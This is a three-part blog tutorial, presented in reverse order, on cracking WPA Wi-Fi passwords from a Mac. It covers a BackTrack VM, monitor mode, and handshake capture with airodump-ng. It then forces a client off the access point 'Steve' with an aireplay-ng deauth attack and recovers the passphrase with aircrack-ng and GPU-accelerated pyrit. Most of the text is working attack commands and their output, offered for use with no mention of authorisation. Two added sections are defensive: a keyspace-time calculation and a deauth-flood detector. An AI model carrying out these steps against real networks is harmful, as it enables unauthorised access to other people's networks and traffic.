Cracking WiFis, the Apple way; part 3: OpenCL (or CUDA) and pyrit

(part1)
(part2)

Cracking the WPA password with aircrack-ng is slow, especially inside a VM, so the first step is to move the cracking out of BackTrack. We have to get the .cap file out of the VM: just drag it from the VM to the desktop.

Using only the CPU is slow as well. A modern GPU cracks considerably faster than the CPU.

Xcode Command Line Tools only

OS X Mountain Lion ships with OpenCL. Full Xcode is big and most of it is iOS and OS X development tooling we don't need, so the Command Line Tools alone can be installed. You need an Apple developer account (it's free) to download them:

[screenshot]

Then:

[screenshot]

Click Next or Continue or whatever until it is done.

or Xcode (full version)

Full Xcode can be installed from the App Store:

[screenshot]

Then the Command Line Tools have to be installed. Go to Xcode, then Properties:

[screenshot]

Install Pyrit (AMD Radeon)

Pyrit is a Python tool that cracks WPA passwords.

Prerequisites. Download these into a folder, named PYRIT for example:

http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz

Then, in that folder, run the following in Terminal (the scapy directory name follows the version inside scapy-latest.tar.gz; it was 2.1.0 at the time of writing):

tar -xzf libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
cd ../..

tar -xzf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
sudo python setup.py install
cd ..

tar -xzf scapy-latest.tar.gz
cd scapy-2.1.0
sudo python setup.py install
cd ..

Now, it's time for the pyrit tool:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only

cd pyrit-read-only
cd pyrit
sudo python setup.py install

Install Pyrit (NVidia)

Extra steps for NVIDIA cards:

Download the NVIDIA driver from http://developer.nvidia.com/cuda/cuda-downloads.

Without the NVIDIA driver you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.

Check the first and second option:

Then:

cd ..
cd ..
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Test Pyrit

On a MacBook with an ATI card we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'OpenCL-Device 'ATI Radeon HD 6750M''
#2: 'CPU-Core (SSE2/AES)'
#3: 'CPU-Core (SSE2/AES)'
#4: 'CPU-Core (SSE2/AES)'
#5: 'CPU-Core (SSE2/AES)'
#6: 'CPU-Core (SSE2/AES)'
#7: 'CPU-Core (SSE2/AES)'
#8: 'CPU-Core (SSE2/AES)'

On a MacBook with an NVIDIA card we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'CUDA-Device #1 'GeForce 9400M''
#2: 'CPU-Core (SSE2)'

Note: I have no idea why, when OpenCL or CUDA is installed, it takes the place of one of the cores; on a quad-core we get 7 cores with OpenCL. When benchmarking, it seems all cores are being utilized. I guess it's a bug.

Benchmarking

$ pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (7724.0 PMKs/s)... -
 
Computed 7723.98 PMKs/s total.
#1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
#3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
#4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
#5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
#6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
#7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
#8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)

You can see that the GPU is faster than the 7 CPU cores (there should be 8; I don't know why one is missing).
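To make sense of the benchmark unit, here is an added example (not from the post or from pyrit) that derives a WPA Pairwise Master Key the way the standard specifies and turns a PMKs/s rate into worst-case keyspace exhaustion times. WPA/WPA2-Personal derives the PMK as PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes out, and every guess a cracker makes costs one such derivation, which is exactly what the benchmark counts. The 7724.0 PMKs/s figure is the post's own; the sample guesses are constructed here. Requires Python 3.5+ (the post's tooling is Python 2).

```python
# Added example, not from the original post or from pyrit: what "PMKs/s"
# measures and what it implies for passphrase strength.  Python 3.5+.
#
# IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the standard
PMK_LEN = 32               # 256-bit PMK

# Total throughput reported by the post's benchmark (Radeon HD 6750M + 7 CPU cores).
POST_BENCHMARK_RATE = 7724.0


def pmk(passphrase, ssid):
    """Derive the WPA PMK for a passphrase/SSID pair; returns 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def cpu_pmks_per_second(ssid, n=50):
    """Single-threaded Python throughput, to compare with pyrit's per-core figures."""
    guesses = ["guess%08d" % i for i in range(n)]   # constructed sample passphrases
    t0 = time.perf_counter()
    for g in guesses:
        pmk(g, ssid)
    return n / (time.perf_counter() - t0)


def seconds_to_exhaust(charset_size, length, rate):
    """Worst-case seconds to try every passphrase of `length` symbols at `rate` PMKs/s."""
    return (charset_size ** length) / rate


def exhaustion_table(rate=POST_BENCHMARK_RATE):
    """Exhaustion time for a few passphrase classes at `rate`; returns (label, seconds) pairs."""
    classes = [
        ("8 digits", 10, 8),
        ("8 lowercase letters", 26, 8),
        ("8 mixed-case letters and digits", 62, 8),
        ("12 mixed-case letters and digits", 62, 12),
    ]
    return [(label, seconds_to_exhaust(cs, ln, rate)) for label, cs, ln in classes]


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
    print(pmk("password", "IEEE").hex())
    print("this CPU, one Python thread: %.0f PMKs/s" % cpu_pmks_per_second("IEEE"))
    for label, secs in exhaustion_table():
        print("%-36s %14.1f days" % (label, secs / 86400))
```

Two things fall out of the derivation. Because the SSID is the salt, precomputed PMK tables (what pyrit's database mode builds) only apply to one SSID, so a non-default SSID forces the attacker to recompute per network. And at the post's rate an all-digit 8-character passphrase is exhausted in a few hours, while a 12-character random alphanumeric one is out of reach by many orders of magnitude; length of a random passphrase is what matters, not GPU count.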

Wordlists

Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html

gfxCardStatus

Make sure gfxCardStatus is in Discrete Only mode.

[screenshot]

Otherwise pyrit will complain:

Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
[...]
SystemError: Failed to create command-queue (CL_INVALID_VALUE)
[...]
SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly

Cracking with Pyrit

$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)
 
Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
Attacking 20 handshake(s).
Tried 140007 PMKs so far; 7550 PMKs per second.
 
The password is 'forzajuve'.

--all-handshakes means that all handshakes in the file are used together.

It utilizes the CPU and the GPU simultaneously, and we now get around 10k attempts/sec, which is a lot better than aircrack-ng in a VM.

Note: your computer will become unresponsive; make sure anything CPU- or GPU-intensive is switched off.

Some stuff was taken from here.

Check the wifis category for more tutorials.

Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack; let's choose Steve. The --bssid parameter says which AP to listen for, -c says which channel to stay on, and -w gives the file prefix to dump the captured authentication to (airodump-ng appends a counter and extension, so the prefix Steve produces Steve-01.cap, the file used below).

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve

[screenshot]

This attack is called the deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c the client we deauth, -0 is the attack, and 1 means perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5

[screenshot]

And we get the handshake.
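From the other side of the fence, the attack above is noisy: the forged frames are unauthenticated management frames, and a sudden burst of them for one client is easy to spot. The following added example (not part of the post, and not aircrack-ng code) is a minimal detector for it: it parses raw IEEE 802.11 management frames as a monitor-mode capture delivers them, counts deauthentication (subtype 12) and disassociation (subtype 10) frames per (BSSID, client) pair in a sliding window, and reports a burst above a threshold. The sample trace at the bottom is constructed inline and only reuses the BSSID and client address the post shows; the reason codes and the radiotap header in the test are constructed values. Python 3.

```python
# Added example, not part of the original post: detecting a deauthentication
# flood from the defender's side.  Input: raw 802.11 frames, optionally
# preceded by a radiotap header.  Sample frames below are constructed.
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0      # frame-control byte 0: type 0 (management), subtype 12
DISASSOC_FC0 = 0xA0    # type 0 (management), subtype 10
BEACON_FC0 = 0x80      # type 0 (management), subtype 8: benign, ignored here
MGMT_HEADER_LEN = 24   # FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2)


def mac_str(b):
    return ":".join("%02X" % x for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_mgmt(frame, has_radiotap=False):
    """Return (kind, addr1, addr2, bssid, reason) for deauth/disassoc frames, else None."""
    if has_radiotap:
        if len(frame) < 4:
            return None
        (rt_len,) = struct.unpack_from("<H", frame, 2)   # radiotap length, little-endian
        frame = frame[rt_len:]
    if len(frame) < MGMT_HEADER_LEN + 2:
        return None
    fc0 = frame[0]
    if fc0 not in (DEAUTH_FC0, DISASSOC_FC0):
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, MGMT_HEADER_LEN)
    kind = "deauth" if fc0 == DEAUTH_FC0 else "disassoc"
    return kind, mac_str(addr1), mac_str(addr2), mac_str(addr3), reason


class DeauthDetector:
    """Sliding-window counter of deauth/disassoc frames per (BSSID, client)."""

    def __init__(self, threshold=3, window_s=10.0):
        self.threshold = threshold
        self.window_s = window_s
        self._seen = defaultdict(deque)

    def observe(self, ts, frame, has_radiotap=False):
        """Feed one frame with its capture timestamp; return an alert string or None."""
        parsed = parse_mgmt(frame, has_radiotap)
        if parsed is None:
            return None
        kind, addr1, addr2, bssid, reason = parsed
        # Frames may go AP->client or client->AP; the non-BSSID address is the client.
        client = addr1 if addr2 == bssid else addr2
        q = self._seen[(bssid, client)]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()
        if len(q) == self.threshold:   # fire once, when the threshold is crossed
            return ("%s flood: %d frames for client %s on BSSID %s within %.0fs "
                    "(last reason code %d)" % (kind, len(q), client, bssid, self.window_s, reason))
        return None


def sample_frame(fc0, addr1, addr2, bssid, body, seq=0):
    """Constructed test input: 24-byte management header followed by `body`."""
    return (bytes([fc0, 0x00]) + b"\x00\x00" + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(bssid) + struct.pack("<H", seq << 4) + body)


AP = "00:0F:01:37:1A:A0"        # BSSID from the post
CLIENT = "F0:D1:A9:AE:E7:A5"    # client address from the post


def run_sample():
    """Replay a constructed trace: one legitimate deauth, a beacon, then a forged burst."""
    det = DeauthDetector(threshold=3, window_s=10.0)
    trace = [
        (0.0, sample_frame(DEAUTH_FC0, CLIENT, AP, AP, struct.pack("<H", 2))),   # AP kicks client once
        (50.0, sample_frame(BEACON_FC0, "FF:FF:FF:FF:FF:FF", AP, AP, b"")),       # ignored
    ]
    for i in range(5):   # burst, alternating direction
        dst, src = (CLIENT, AP) if i % 2 == 0 else (AP, CLIENT)
        trace.append((100.0 + 0.1 * i, sample_frame(DEAUTH_FC0, dst, src, AP, struct.pack("<H", 7), seq=i)))
    alerts = []
    for ts, frame in trace:
        alert = det.observe(ts, frame)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_sample():
        print(a)
```

The single legitimate deauth at t=0 never trips the detector; the burst does, once. A wireless IDS does essentially this, keyed on the same (BSSID, client) pair. The structural fix is 802.11w Protected Management Frames, which gives deauthentication and disassociation frames a message integrity code so forged ones are discarded by the client; WPA3 requires it, and most WPA2 gear can enable it.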

Now we crack it, using a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt

If the password is in the wordlist, then

Unfortunately this method tries only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.

Cracking WiFis, the Apple way; part 1: external card, backtrack, aircrack-ng, the VM

OS X natively is no good

First, trying to crack Wi-Fi APs natively on OS X does not work well. KisMAC is not great and cannot inject packets with the MacBook's built-in Wi-Fi card, and aircrack-ng does not work.

The usb wi-fi card

So to inject, an external USB Wi-Fi card is required. I have tried the ALFA AWUS036NEH (chipset Ralink RT3070) and the TP-Link TL-WN722N (chipset Atheros AR9271).

ALFAs are recommended by half the internet, but I think they suck. My Alfa is not stable; it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but has no 5 GHz. I'm waiting for the NETGEAR WNDA3200, which has a 5 GHz radio that works simultaneously with the 2.4 GHz radio.

The VM

The best VM to use is BackTrack: all the cracking tools are inside. The latest version is BT5R3, and it even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.

(user: root, pass: toor; run startx to launch GNOME)

Attaching the USB card to the VM:

[screenshot]

Then in a terminal we check for a Wi-Fi card. We find one on wlan1 and start a monitor-mode interface for it.

# airmon-ng
# airmon-ng start wlan1
# airmon-ng

Then, let's check the wi-fis:

# airodump-ng mon0

In later articles we'll see how to hack the wi-fi.